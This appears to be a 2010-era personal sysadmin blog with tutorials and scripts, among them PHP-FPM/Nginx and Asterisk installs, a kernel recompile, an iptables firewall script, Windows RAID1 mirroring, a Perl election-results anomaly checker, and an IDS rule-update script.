Canonical Ubuntu 10.10 on Amazon EC2 + Nginx + PHP-FPM

This procedure was performed on a 32bit OS (Micro instance) but may also work with little or no modification. Drop me a note if you get this to work on a 64bit without modification.

1. First you need to install pre-reqs

apt-get install gcc autoconf libevent-dev libxml2-dev  libssl-dev libpcre++-dev libbz2-dev libcurl4-openssl-dev libgmp3-dev libmysql++-dev libmcrypt-dev

2. Add the nginx user
useradd nginx

3. Compile and install PHP
mkdir /root/files && mkdir /etc/php.d && cd /root/files

wget http://sg2.php.net/get/php-5.3.4.tar.gz/from/sg.php.net/mirror

tar xvfz php-5.3.4.tar.gz && cd php-5.3.4

./configure --host=i686-ubuntu-linux-gnu --build=i686-ubuntu-linux-gnu --target=i386-ubuntu-linux --program-prefix= --prefix=/usr --exec-prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --sysconfdir=/etc --datadir=/usr/share --includedir=/usr/include --libdir=/usr/lib --libexecdir=/usr/libexec --localstatedir=/var --sharedstatedir=/usr/com --mandir=/usr/share/man --infodir=/usr/share/info --cache-file=../config.cache --with-libdir=lib --with-config-file-path=/etc --with-config-file-scan-dir=/etc/php.d --disable-debug --disable-rpath --without-pear --without-gdbm --without-gd --without-pspell --without-unixODBC --without-sqlite --without-sqlite3 --with-libxml-dir=/usr --with-pic --with-bz2 --with-curl --with-exec-dir=/usr/bin --with-freetype-dir=/usr --with-png-dir=/usr --with-gettext --with-gmp --with-iconv --with-jpeg-dir=/usr --with-openssl --with-pcre-regex=/usr --with-zlib --with-layout=GNU --with-mysql --enable-gd-native-ttf --enable-exif --enable-magic-quotes --enable-sockets --enable-sysvsem --enable-sysvshm --enable-sysvmsg --enable-wddx --enable-ucd-snmp-hack --enable-calendar --enable-xml --enable-mbstring --enable-inline-optimization --disable-dom --disable-dba --disable-pdo --disable-xmlreader --disable-xmlwriter --disable-json --enable-fpm --with-fpm-user=nginx --with-fpm-group=nginx

make all install

cp /root/files/php-5.3.4/php.ini-production /etc/php.ini && mv /etc/php-fpm.conf.default /etc/php-fpm.conf && cp /root/files/php-5.3.4/sapi/fpm/init.d.php-fpm /etc/init.d/php-fpm

chmod +x /etc/init.d/php-fpm

4. PHP-FPM configuration
cat << END >> /etc/php-fpm.conf
pm.start_servers = 20
pm.min_spare_servers = 5
pm.max_spare_servers = 35
END

5. Compile and install Nginx
cd /root/files && wget http://nginx.org/download/nginx-0.8.53.tar.gz

tar xvfz nginx-0.8.53.tar.gz

mkdir /etc/nginx/ && mkdir /var/log/nginx/ && cd nginx-0.8.53

./configure --sbin-path=/usr/sbin --without-mail_pop3_module --without-mail_imap_module --without-mail_smtp_module --with-http_stub_status_module --conf-path=/etc/nginx/nginx.conf --error-log-path=/var/log/nginx/error.log --pid-path=/var/run/nginx.pid --user=nginx --group=nginx --http-log-path=/var/log/nginx/access.log 

make && make install

6. Fast-CGI Configuration
cat << END >> /etc/nginx/fastcgi_params
fastcgi_connect_timeout;
fastcgi_send_timeout 180;
fastcgi_read_timeout 180;
fastcgi_buffer_size 128k;
fastcgi_buffers 4 256k;
fastcgi_busy_buffers_size 256k;
fastcgi_temp_file_write_size 256k;
fastcgi_intercept_errors on;
END

7. Get Nginx init script from http://wiki.nginx.org/Nginx-init-ubuntu. Make the following changes:
DAEMON=/usr/sbin/nginx
NGINX_CONF_FILE="/etc/nginx/nginx.conf

8. Make Nginx and PHP-FPM run on start-up
update-rc.d nginx start 99 2 3 4 5 . stop 80 0 1 6 .
update-rc.d php-fpm start 99 2 3 4 5 . stop 80 0 1 6 .

9. Setup log rotate
cat << END > /etc/logrotate.d/nginx
/var/log/nginx/*.log {
weekly
missingok
rotate 52
compress
delaycompress
notifempty
create 640 root adm
sharedscripts
postrotate
[ ! -f /var/run/nginx.pid ] || kill -USR1 `cat /var/run/nginx.pid`
endscript
}
END

10. Installing additional modules. If you want to install additional PHP modules for your applications, it's easy. All you have to do is go to your PHP source directory, compile the module and copy the compiled module to the PHP modules directory which in this case is /usr/lib/20090626. It looks something like this:
cd /root/files/php-5.3.4/ext/json

phpize
./configure && make

cp modules/json.so /usr/lib/20090626/

/etc/init.d/php-fpm restart

Connecting to MySQL from C -- Sample Code

I got curious how to connect to a MySQL server from C. This code is a rip-off from another blog but made minor modifications to get rid of compile warnings. My test system is Snow Leopard 10.6.3.


Compile by:

gcc -o test $(mysql_config --cflags) test.c $(mysql_config --libs)

Code

Election 2010 Anomaly Watcher - revised


I modified the original script to include another check. So the script now checks for two things. First, it checks for candidates having a high percentage of votes and second, it checks for low percentage of votes in a position as compared to the total of people you actually voted. See example below:


In the figure above, the number of people who actually voted for a president is 27 but the total number of people who voted in that CP is 189. What happened to the other 162? On that same page other positions like Governor/Vice-governor looked normal.

So there is my modified script:

Howto Recompile the Kernel - UBUNTU Way


First, why should you upgrade or change your kernel? Here are just some of the reasons:
  • You need a feature that only the newer kernel supports
  • You came across a bug which is fixed in the newer version
  • You have a device driver that needs kernel recompile either as a module or compiled with the kernel
  • You are bored
As for me, I got bored.

Overview of the process:
  1. Update apt sources
  2. Install the necessary pre-requisites
  3. Get the kernel source
  4. Compile
  5. Install the kernel and modules
  6. Reboot with the new kernel

Here are are the steps:

1. Update your APT sources
apt-get update

2. In Ubuntu 10.04, /bin/sh is linked to /bin/dash. This may be a problem during compilation. Change the link from /bin/dash to /bin/bash
rm -f /bin/sh
ln -s /bin/bash /bin/sh

3. Install pre-requisites
apt-get install kernel-package libncurses5-dev fakeroot wget bzip2

4.Get the kernel source
cd /usr/src/
wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.34.tar.bz2
tar xjf linux-2.6.34.tar.bz2
ln -s linux-2.6.34 linux
cd linux

5. Copy the config of the running kernel as a basis configuration for the new kernel. It's usually a good idea to do this.
cp /boot/config-`uname -r` ./.config

6. Now we are ready to select kernel options. This is also the time to select weather you want a driver compiled as module, with the kernel or not to include at all. You have to options in doing this -- using a nice GTK menu or using the console (curses based). The latter is usually the way to go but if you want the former make sure you install libgtk2.0-dev and libglade2-dev first. For now, we will go with the console (curses)

make menuconfig

or

make gconfig

This will bring up the kernel configuration menu. Go to "Load Alternate Configuration File" and choose ".config" as the configuration file. This will load the configuration for the currently running kernel. Browse through the options and make your changes. When you are finished select "Exit" and choose YES to save.

7. We are now ready to compile the kernel. This process will take a considerable amount of time depending on the speed of your machine and the number of modules you choose to compile.
make-kpkg clean
fakeroot make-kpkg --initrd --append-to-version=-custom kernel_image kernel_headers

You can substitute anything for --append-to-version paramater as long as it starts with a "-". This string may be your version or revision number or simply just a tag.

8. When compilation is done, we can now install the new kernel and modules
cd /usr/src/

[email protected]:/usr/src# ls -la
total 106128
drwxrwsr-x  5 root src      4096 2010-05-18 14:50 .
drwxr-xr-x 11 root root     4096 2010-05-18 09:29 ..
lrwxrwxrwx  1 root src        12 2010-05-18 09:33 linux -> linux-2.6.34
drwxr-xr-x 25 root root     4096 2010-05-18 14:48 linux-2.6.34
-rw-r--r--  1 root src  67633622 2010-05-17 05:37 linux-2.6.34.tar.bz2
drwxr-xr-x 24 root root     4096 2010-02-10 01:07 linux-headers-2.6.32-12
drwxr-xr-x  7 root root     4096 2010-02-10 01:07 linux-headers-2.6.32-12-generic
-rw-r--r--  1 root src   6675822 2010-05-18 14:50 linux-headers-2.6.34-custom_2.6.34-custom-10.00.Custom_i386.deb
-rw-r--r--  1 root src  34340580 2010-05-18 14:47 linux-image-2.6.34-custom_2.6.34-custom-10.00.Custom_i386.deb 
dpkg -i linux-image-2.6.34-custom_2.6.34-custom-10.00.Custom_i386.deb
dpkg -i linux-headers-2.6.34-custom_2.6.34-custom-10.00.Custom_i386.deb

9. Reboot. Enjoy!

Channel Vision Telephone Lightning Protector

I recently got eight units of Channel Vision Telephone Lightning Protector (model C-0410).Channel Vision C-0410 surge protection (stopper) module is compatible with all Loop start Consumer Premise equipment.

PRODUCT FEATURES:
  • Complies with UL 1459 and UL 1950 power cross requirements
  • Passes FCC Part 68 Type A and Type B lighting tests operationally
  • Provides un-balanced line over voltage and over current protection
  • Automatically resets once surge condition has cleared restoring the phone line
  • 4 lines in
  • 4 lines out
The device is pretty interesting. Its input interface is a 110 block where you can use any standard 110 punch tool. For the output interface, you can either use the 110 block or the RJ45 interface. The device uses thermal fuses. It disconnects the line during a power surge and automatically reconnects when the unit cools down, cool huh! :)




We imported it from the US of A, anyone know where I can get these locally? Product page can be found here.

Election 2010 Anomaly Watcher

While the 2010 Election was generally peaceful and the results came in fast, it doesn't mean the results were correct. I am referring to:

http://electionresults.ibanangayon.ph/res_reg5808114.html
http://electionresults.ibanangayon.ph/res_reg5808113.html
http://electionresults.ibanangayon.ph/res_reg5808112.html
http://electionresults.ibanangayon.ph/res_reg5808111.html
http://electionresults.ibanangayon.ph/res_reg5808110.html

These results are impossible and could not possibly happen. This is just for 5 clustered precincts. The effect of this mistake for a hundred CP is unimaginable lest a thousand. So i whipped out a small script to find other precincts where results are "questionable". The script basically checks for the "percentage" of votes garnered for a particular candidate. If it goes beyond the pre-configured threshold, it flags the file and makes a log.

Also, you need a local mirror of http://electionresults.ibanangayon.ph which can be easily accomplished with:

wget --mirror –w 2 –-convert-links http://electionresults.ibanangayon.ph

If you are on PLDT, use http://124.105.166.195/, for GlobeTelecom, use http://222.127.18.105/

Remember to edit $SearchFor, $mirror and $threshold to suit for needs.

#!/usr/bin/perl
#
# Election 2010 Anomaly Watcher
# John Homer H Alvero
# [email protected]
# May 13, 2010

use HTML::TableExtract;
use LWP::Simple;

# SearchFor:
# Possible Values:
#
# 1 = President
# 3 = Vice President
# 5 = Senator
# 7 = Party List

my $SearchFor = 1;
my $mirror = "/var/www/election/electionresults.ibanangayon.ph/";
my $threshold = 90;

&check_folders($mirror);

# SUB(s)
sub check_folders {

   my($dir) = @_;
   local (*FOLDER);

   my(@subfiles, $file, $specfile);
   opendir(FOLDER, $dir) or die "cannot open $dir";

   @subfiles = readdir(FOLDER);
   closedir(FOLDER);


   foreach $file (@subfiles) {
      $specfile = $dir .  $file;
      if (-f $specfile && $file =~ m/\S+\.html/) {
        my $page = get("file://" . $specfile) or die $!;
        $te = HTML::TableExtract->new( headers => [qw(Candidate Votes Percentage)], depth => 0, count => $SearchFor );
        $te->parse($page);

        foreach $ts ($te->tables) {
                foreach $row ($ts->rows) {
                        chop( $votes = @$row[2]);
                        if ($votes > $threshold) {
                                print "Found filename " . $specfile . " name:" .  @$row[0] . " at $votes%" . "\n";
                        }
                }
        }
#Check for Subdirectories (not really needed)
      } elsif (-d $specfile) {
        if ($specfile !~ m/\S+\.$/) {
                &check_folders($specfile . "\/");
        }
      }#if
   }#for
}#sub

UPDATE: (May 17, 2010)

I ran the script on my local mirror and here is what I found. (note that my local is not complete yet and scanning is not yet over)

[email protected]:/home/john/ibangangayon/124.105.166.195# /root/table.pl
Found filename res_reg3629006.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg3615004.html name:ACOSTA, Vetellano S. at 100.00%
Found filename res_reg3636022.html name:VILLAR, Manuel Jr B. at 100.00%
Found filename res_reg5512002.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg313022.html name:AQUINO, Benigno Simeon III C. at 99.20%
Found filename res_reg3516000.html name:AQUINO, Benigno Simeon III C. at 98.20%
Found filename res_reg3807028.html name:VILLAR, Manuel Jr B. at 99.09%
Found filename res_reg3826010.html name:VILLAR, Manuel Jr B. at 99.49%
Found filename res_reg6615003.html name:VILLAR, Manuel Jr B. at 98.15%
Found filename res_reg3601016.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg705032.html name:AQUINO, Benigno Simeon III C. at 98.55%
Found filename res_reg3812027.html name:AQUINO, Benigno Simeon III C. at 99.64%
Found filename res_reg6610016.html name:TEODORO, Gilberto Jr.  C. at 98.01%
Found filename res_reg6606006.html name:AQUINO, Benigno Simeon III C. at 98.35%
Found filename res_reg3807036.html name:VILLAR, Manuel Jr B. at 98.84%
Found filename res_reg3835015.html name:VILLAR, Manuel Jr B. at 98.18%
Found filename res_reg302019.html name:AQUINO, Benigno Simeon III C. at 98.88%
Found filename res_reg3812029.html name:AQUINO, Benigno Simeon III C. at 99.67%
Found filename res_reg705034.html name:AQUINO, Benigno Simeon III C. at 98.79%
Found filename res_reg3826008.html name:VILLAR, Manuel Jr B. at 98.97%
Found filename res_reg3803017.html name:TEODORO, Gilberto Jr.  C. at 98.32%
Found filename res_reg3803013.html name:TEODORO, Gilberto Jr.  C. at 98.92%
Found filename res_reg3807018.html name:VILLAR, Manuel Jr B. at 100.00%
Found filename res_reg3835014.html name:VILLAR, Manuel Jr B. at 98.73%
Found filename res_reg3832009.html name:TEODORO, Gilberto Jr.  C. at 99.24%
Found filename res_reg3812064.html name:AQUINO, Benigno Simeon III C. at 99.29%
Found filename res_reg3617010.html name:VILLAR, Manuel Jr B. at 99.34%
Found filename res_reg3807023.html name:TEODORO, Gilberto Jr.  C. at 99.57%
Found filename res_reg3626009.html name:AQUINO, Benigno Simeon III C. at 98.84%
Found filename res_reg702017.html name:AQUINO, Benigno Simeon III C. at 98.02%
Found filename res_reg3832010.html name:TEODORO, Gilberto Jr.  C. at 99.37%
Found filename res_reg3812047.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg6615012.html name:VILLAR, Manuel Jr B. at 99.19%
Found filename res_reg3812050.html name:AQUINO, Benigno Simeon III C. at 99.87%
Found filename res_reg3629002.html name:VILLAR, Manuel Jr B. at 100.00%
Found filename res_reg6607015.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg6610014.html name:TEODORO, Gilberto Jr.  C. at 98.87%
Found filename res_reg4406026.html name:TEODORO, Gilberto Jr.  C. at 100.00%
Found filename res_reg4406026.html name:VILLAR, Manuel Jr B. at 100.00%
Found filename res_reg4406026.html name:PERLAS, Jesus Nicanor P. at 100.00%
Found filename res_reg4406026.html name:DE LOS REYES, John Carlos G. at 100.00%
Found filename res_reg4406026.html name:ESTRADA EJERCITO, Joseph M. at 100.00%
Found filename res_reg4406026.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg4406026.html name:VILLANUEVA, Eduardo C. at 100.00%
Found filename res_reg4406026.html name:MADRIGAL, Jamby A. at 100.00%
Found filename res_reg4406026.html name:ACOSTA, Vetellano S. at 100.00%
Found filename res_reg4406026.html name:GORDON, Richard J. at 100.00%
Found filename res_reg112002.html name:TEODORO, Gilberto Jr.  C. at 98.33%
Found filename res_reg6606002.html name:AQUINO, Benigno Simeon III C. at 98.58%
Found filename res_reg3832011.html name:TEODORO, Gilberto Jr.  C. at 99.61%
Found filename res_reg3629018.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg6610010.html name:TEODORO, Gilberto Jr.  C. at 99.37%
Found filename res_reg5535035.html name:VILLAR, Manuel Jr B. at 100.00%
Found filename res_reg5535035.html name:VILLANUEVA, Eduardo C. at 100.00%
Found filename res_reg5535035.html name:ACOSTA, Vetellano S. at 100.00%
Found filename res_reg5535035.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg5535035.html name:DE LOS REYES, John Carlos G. at 100.00%
Found filename res_reg5535035.html name:ESTRADA EJERCITO, Joseph M. at 100.00%
Found filename res_reg5535035.html name:GORDON, Richard J. at 100.00%
Found filename res_reg5535035.html name:MADRIGAL, Jamby A. at 100.00%
Found filename res_reg5535035.html name:PERLAS, Jesus Nicanor P. at 100.00%
Found filename res_reg5535035.html name:TEODORO, Gilberto Jr.  C. at 100.00%
Found filename res_reg3812025.html name:AQUINO, Benigno Simeon III C. at 99.62%
Found filename res_reg7001014.html name:TEODORO, Gilberto Jr.  C. at 99.70%
Found filename res_reg3812069.html name:AQUINO, Benigno Simeon III C. at 99.58%
Found filename res_reg1529053.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg1529053.html name:VILLANUEVA, Eduardo C. at 100.00%
Found filename res_reg1529053.html name:PERLAS, Jesus Nicanor P. at 100.00%
Found filename res_reg1529053.html name:TEODORO, Gilberto Jr.  C. at 100.00%
Found filename res_reg1529053.html name:VILLAR, Manuel Jr B. at 100.00%
Found filename res_reg1529053.html name:MADRIGAL, Jamby A. at 100.00%
Found filename res_reg1529053.html name:ACOSTA, Vetellano S. at 100.00%
Found filename res_reg1529053.html name:GORDON, Richard J. at 100.00%
Found filename res_reg1529053.html name:DE LOS REYES, John Carlos G. at 100.00%
Found filename res_reg1529053.html name:ESTRADA EJERCITO, Joseph M. at 100.00%
Found filename res_reg3818005.html name:AQUINO, Benigno Simeon III C. at 98.55%
Found filename res_reg3637008.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg3833002.html name:AQUINO, Benigno Simeon III C. at 99.59%
Found filename res_reg3807022.html name:TEODORO, Gilberto Jr.  C. at 99.67%
Found filename res_reg3802024.html name:AQUINO, Benigno Simeon III C. at 99.37%
Found filename res_reg3836018.html name:ACOSTA, Vetellano S. at 100.00%
Found filename res_reg3635006.html name:TEODORO, Gilberto Jr.  C. at 98.31%
Found filename res_reg3803011.html name:TEODORO, Gilberto Jr.  C. at 98.98%
Found filename res_reg3807007.html name:VILLAR, Manuel Jr B. at 98.72%
Found filename res_reg3835017.html name:VILLAR, Manuel Jr B. at 99.11%
Found filename res_reg6610001.html name:TEODORO, Gilberto Jr.  C. at 99.59%
Found filename res_reg3114084.html name:BINAY, Jejomar C. at 100.00%
Found filename res_reg3114084.html name:CHIPECO, Dominador Jr F. at 100.00%
Found filename res_reg3114084.html name:FERNANDO, Bayani F. at 100.00%
Found filename res_reg3114084.html name:LEGARDA, Loren B. at 100.00%
Found filename res_reg3114084.html name:MANZANO, Eduardo B. at 100.00%
Found filename res_reg3114084.html name:ROXAS, Manuel A. at 100.00%
Found filename res_reg3114084.html name:SONZA, Jose Y. at 100.00%
Found filename res_reg3114084.html name:YASAY, Perfecto R. at 100.00%
Found filename res_reg3812057.html name:AQUINO, Benigno Simeon III C. at 98.96%
Found filename res_reg3812014.html name:AQUINO, Benigno Simeon III C. at 98.59%
Found filename res_reg3812019.html name:AQUINO, Benigno Simeon III C. at 98.92%
Found filename res_reg6604024.html name:VILLAR, Manuel Jr B. at 98.72%
Found filename res_reg5527039.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg5527039.html name:VILLANUEVA, Eduardo C. at 100.00%
Found filename res_reg5527039.html name:DE LOS REYES, John Carlos G. at 100.00%
Found filename res_reg5527039.html name:ESTRADA EJERCITO, Joseph M. at 100.00%
Found filename res_reg5527039.html name:TEODORO, Gilberto Jr.  C. at 100.00%
Found filename res_reg5527039.html name:VILLAR, Manuel Jr B. at 100.00%
Found filename res_reg5527039.html name:PERLAS, Jesus Nicanor P. at 100.00%
Found filename res_reg5527039.html name:MADRIGAL, Jamby A. at 100.00%
Found filename res_reg5527039.html name:ACOSTA, Vetellano S. at 100.00%
Found filename res_reg5527039.html name:GORDON, Richard J. at 100.00%
Found filename res_reg3836013.html name:VILLAR, Manuel Jr B. at 100.00%
Found filename res_reg3817021.html name:ESTRADA EJERCITO, Joseph M. at 98.65%
Found filename res_reg705005.html name:AQUINO, Benigno Simeon III C. at 98.51%
Found filename res_reg3637017.html name:AQUINO, Benigno Simeon III C. at 100.00%
Found filename res_reg3601017.html name:MADRIGAL, Jamby A. at 300.00%
Found filename res_reg3601017.html name:ACOSTA, Vetellano S. at 300.00%
Found filename res_reg3601017.html name:GORDON, Richard J. at 300.00%
Found filename res_reg3601017.html name:DE LOS REYES, John Carlos G. at 300.00%
Found filename res_reg3601017.html name:ESTRADA EJERCITO, Joseph M. at 300.00%
Found filename res_reg3601017.html name:VILLAR, Manuel Jr B. at 300.00%
Found filename res_reg3601017.html name:TEODORO, Gilberto Jr.  C. at 300.00%
Found filename res_reg3601017.html name:PERLAS, Jesus Nicanor P. at 300.00%
Found filename res_reg3601017.html name:AQUINO, Benigno Simeon III C. at 300.00%
Found filename res_reg3601017.html name:VILLANUEVA, Eduardo C. at 300.00%

Booting with OCZ Vertex 60GB SSD

I recently got i nice piece of hardware and I love it. It is intended for a VoIP asterisk server but I took the liberty of testing it first with common operating system (Windows XP, Ubuntu). Here is what I got.



Beginning subversion - svn for the n00b

I compiled a small set of commands for the svn newbie like me. I will update this post whenever needed as I am still learning it myself.

# Create a repository
svnadmin create d:\repos\dbf2009

# Import initial files to repository
svn import -m "Initial Import" DBF2009 svn://ip.address/dbf2009 --username harry

# Checkout
svn co svn://ip/reponame

#checkout from same machine
svn co file:///e:/repos/dbf2009

# Update working copy (local copy)
svn update

# See overview of changed files (comparison from .svn)
svn status

# See defailed info of cahnged files (comparison from server)
svn status -u -v

# Commit changes to svn server
svn commit -m "testing lang"

# See defailed diff
svn diff

# Schedule addition of a file or directory
svn add 

# Rename a repository
# There is no rename command, create a new repo, create a dump file from the old repo,
# load the dump file to the new repo. Don't forget to fix permissions in config directory
svnadmin create /path/to/new/repository/
svnadmin dump /the/path/to/old/repository/ > old-repo.dump
svnadmin load /the/path/to/new/repository/ < old-repo.dump

Basic IPTABLES Firewall Script

Here is a basic firewall script for servers running HTTP and FTP. The script is commented so its easy to put in additional rules. Also note that you have to put your own DNS server in $dnsIP variable. Additional ports (tcp or udp) to be opened may placed in allow_tcp and allow_udp variables. Before using the script make sure to do chmod +x iptables.sh first.

Usage:


./iptables.sh start
or
./iptables.sh stop

and now the script:

#!/bin/sh
# John Homer H Alvero
# [email protected]
# March 9, 2010

set -e

iptables="/sbin/iptables"
modprobe="/sbin/modprobe"
dnsIP="8.8.8.8"         #IP Address of DNS server
allow_tcp="80 22"       #This will allow SSH and HTTP, add more ports as needed
allow_udp=""

load () {
        echo "Loading Kernel modules"
        $modprobe ip_tables
        $modprobe ip_conntrack
        $modprobe iptable_filter
        $modprobe ipt_state
        echo "Kernel modules loaded."

        echo "Loading rules"

        #Set Default policy
        $iptables -P FORWARD DROP
        $iptables -P INPUT DROP
        $iptables -P OUTPUT DROP

        #Allow RELATED and ESTABLISHED connections
        $iptables -A OUTPUT -m state --state RELATED,ESTABLISHED -j ACCEPT

        #Allow traffic to localhost
        $iptables -A INPUT -s 127.0.0.1 -j ACCEPT

        #Allow DNS Queries to DNS Server
        $iptables -A INPUT -p udp -s $dnsIP/32 --source-port 53 -d 0/0 --destination-port 1024:65535 -j ACCEPT
        $iptables -A OUTPUT -p udp --destination $dnsIP --dport 53  -j ACCEPT

        if [ -n "$allow_tcp" ]; then
        for i in $allow_tcp
        do
                $iptables -A INPUT -p tcp -m tcp --destination-port $i -j ACCEPT
        done
        fi

        if [ -n "$allow_udp" ]; then
        for i in $allow_udp
        do
                $iptables -A INPUT -p udp --destination-port $i -j ACCEPT
        done
        fi


        #Add additional rules here.

        echo "Rules loaded."
}

flush () {
        echo "Flushing rules..."
        $iptables -P FORWARD ACCEPT
        $iptables -P OUTPUT ACCEPT
        $iptables -P INPUT ACCEPT
        $iptables -F
        echo "Rules flushed."
}

case "$1" in
        start|restart)
                flush
                load
                ;;
        stop)
                flush
                ;;
        *)
                echo "usage: start|stop|restart"
                ;;
esac
exit 0

Ubuntu 9.10 + Asterisk + Asterisk-GUI Installation

Software used:
  • Ubuntu 9.10 Karmic
  • Asterisk 1.4.30-rc2
  • libpri 1.4.10.2
  • dahdi drivers/tools 2.2.1
  • asterisk-gui 2.0
I settled for a 1.4 asterisk instead of 1.6 because I was having issues making asterisk-gui work with asterisk.

Now for the steps:

1. Install necessary prerequisites

sudo apt-get install linux-headers-$(uname -r) build-essential autoconf automake autotools-dev bison flex libncurses5-dev libssl-dev libtool subversion svn-buildpackage libxml2-dev
and create working folder
sudo mkdir /usr/src/asterisk
sudo cd /usr/src/asterisk


2. Download necessary files
sudo wget http://downloads.asterisk.org/pub/telephony/asterisk/asterisk-1.4.30-rc2.tar.gz
sudo wget http://downloads.asterisk.org/pub/telephony/libpri/releases/libpri-1.4.10.2.tar.gz
sudo wget http://downloads.asterisk.org/pub/telephony/dahdi-linux-complete/releases/dahdi-linux-complete-2.2.1+2.2.1.tar.gz
sudo svn co http://svn.digium.com/svn/asterisk-gui/branches/2.0 asterisk-gui

3. Unpack the packages
sudo tar -xvf asterisk-1.4.30-rc2.tar.gz
sudo tar -xvf libpri-1.4.10.2.tar.gz
sudo tar -xvf dahdi-linux-complete-2.2.1+2.2.1.tar.gz


4. Install libpri
cd libpri-1.4.10.2
sudo make clean
sudo make
sudo make install

5. Install dahdi-linux
cd ..
cd dahdi-linux-complete-2.2.1+2.2.1
sudo make
sudo make install

6. Asterisk
cd ..
cd asterisk-1.4.30-rc2
sudo make clean
sudo ./configure
sudo make install
sudo make samples
sudo make config

7. Now for the web interface, Asterisk-GUI
cd ../asterisk-gui
sudo make clean
sudo ./configure
sudo make
sudo make install

8. Before you can finally use the web interface, you need to make some minor configuration.
sudo vim /etc/asterisk/http.conf

and make the following changes:

[general]
enabled=yes
enablestatic=yes
bindaddr=0.0.0.0 or your IP Server
bindport=8088

9. Add the manager account
sudo vi /etc/asterisk/manager.conf

and make the following changes

[general]
enabled = yes
webenabled = yes
port = 5038
bindaddr = 0.0.0.0 or your IP Server

at the bottom of the file, add the following config:

[admin]
secret = yourpassword
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,config

10. Open the web interface at http://192.168.0.1:8088/asterisk/static/config/index.html

Screenshots:
System Status

Add/Edit User

Windows 2003 RAID1 mini HOW TO (recovering from a failed drive) - Part 2

Recovering from a failed drive is simple. You just have to remove the mirror and add a mirror to the new drive.


Recovering from a failed secondary drive


1. In Disk Management, right click your first partition and choose Remove Mirror...

2. Do the same to other partitions.

3. Now, with the new drive in place, build the new mirror as described in the first part of this how to.


Recovering from a failed primary drive


You need to get your hands dirty a bit.

1. Open up your server's casing and remove the failed drive (primary disk)

2. Move the second drive to the first SATA/IDE port (where the primary drive was previously connected)

3. Start up the server, boot normally. Disk Management will look something like this:
Notice the Missing status on the mirror drive. We removed the mirror and moved it to become the primary drive. Thus, the missing status.


4. Right click on the first partition in Disk 0 and choose Remove Mirror...

Do the same to other partitions.


5. The following prompt may appear because the mirror drive is missing. It is safe to just click OK.


6. Disk Management should look something like this.


7. You can now proceed to Adding a mirror as described in the first part of this how to.



Windows 2003 RAID1 mini HOW TO - Part 1

This step-by-step article describes how to mirror the system and boot partition in Windows Server 2003. This scenario is based on the assumption that the system and boot files are located on disk 0 and that disk 1 is unallocated space.

First some definition:

RAID 1 mirroring is an arrangement of hard disks that creates an exact copy (or mirror) of a set of data on two or more disks. This is useful when read performance or reliability are more important than data storage capacity.

Requirements:
  • At least two hard-disk drives; IDE, small computer system interface (SCSI), or mixed architecture is permissible.
  • The second drive must be at least the size of the volume on which the operating system boot and system files reside to permit mirroring.
  • The Windows Server 2003 system and boot files must reside on the same volume to be mirrored.

Objective:

  • To add a mirror to the primary drive for redundancy so that when either of the drive fails, quick recovery can be done.



There are two parts in this process -- Converting your Disks to Dynamic Disks and Adding the Actual Mirror.


Converting to Dynamic Disks

Steps:

1. Right click on My Computer on your desktop and click Manage. Under Storage, click Disk Management.

2. Right click on Disk0 and choose Convert to Dynamic Disk...

3. Tick Disk0 and Disk1 and click OK.

4. Review the disks to be converted, click Convert to proceed.

5. The next menu is a warning that other operating systems installed on any volumes on any disks can no longer start. Make sure that you are not dual booting other operating systems. Click Yes to proceed.

6. Now for the final confirmation. Click Yes to proceed.

7. Click OK when prompted. This will restart your server.

8. At this point, new drivers where installed to support the dynamic disks. You will now be prompted to restart - AGAIN.

9. That completes the process of converting to dynamic disks. You can now proceed to adding actual mirror.


Adding the Mirror

On my primary drive, I have setup pre-setup two partitions. One for the operating system and program files and another for my data. We are going to mirror both.

1. Go to Disk Management as described in the previous process.

2. Right click on the first partition and click Add Mirror..

3. Select the second drive (Disk 1), then click Add Mirror.

4. The partition will now sync to the second drive. Notice that the mirrored partition will now be color coded. It will look something like this.

5. Repeat the same step to the second partition.

When the sync-ing process is done. You now have a RAID 1 system when means, you have 1 parity. Your data is safe even if 1 drive fails.

Part 2 of this mini HOW TO will discuss on how to recover from a failed drive.

References:


Untangle UTM IPS Update Script

This script will generate an .sql file from emergingthreats.net ready for dumping to Untangle Postgres database. Although this script may not be needed as Untangle will auto-update itself, but for those who want to be cutting-edge, this script is for you. You will have to manually update the table by:

psql -e -f newrules.sql uvm postgres

Now for the script:

#! /bin/bash
# John Homer H Alvero
# Feb 13, 2010

# Change to working directory
cd /root/emergingthreats

RULEFILE='emerging-all.rules'

LIVE="t"
LOGGING="t"

/usr/bin/wget http://www.emergingthreats.net/version.txt

if [ "$?" -ne "0"  ];  then
  # failed download - abort run
  exit
fi

exec < version.txt
read CURRENTVERSION

echo $CURRENTVERSION
exec < oldversion.txt
read OLDVERSION
echo $OLDVERSION

if [ ${CURRENTVERSION} -eq ${OLDVERSION} ];  then 
    echo "same release available - checking next for updates to exceptions"
    rm -f version.txt* 

else 

  echo "new version available"

  rm -f $RULEFILE
  /usr/bin/wget http://www.emergingthreats.net/rules/$RULEFILE

  if [ "$?" -ne "0"  ];  then
    echo "failed retrieve of new files - exiting"
    exit 3
  fi 

  mv version.txt oldversion.txt
  rm -f version.txt* 

  # Process file now

  echo "delete from n_ips_rule where Category = 'EmergingThreat';">newrules.sql
  RACK=( )
  DATA=`psql -c "SELECT settings_id from n_ips_settings;" uvm postgres`  
  for d in $DATA
  do
    if [ -z "$(echo  "$d"                |\
      sed 's/[0-9]//g;s/[0-9]//g;s/\.//'  \
        )" ] ; then 
      RACK=`echo " $RACK $d" `
    fi
  done

  CUSTOMSID=50000

  exec <$RULEFILE
  while read RULES
  do 
    CHAR1=`echo $RULES|awk '{print substr($0,1,1)}'`
    WORD1=`echo $RULES|awk '{print $1}'`
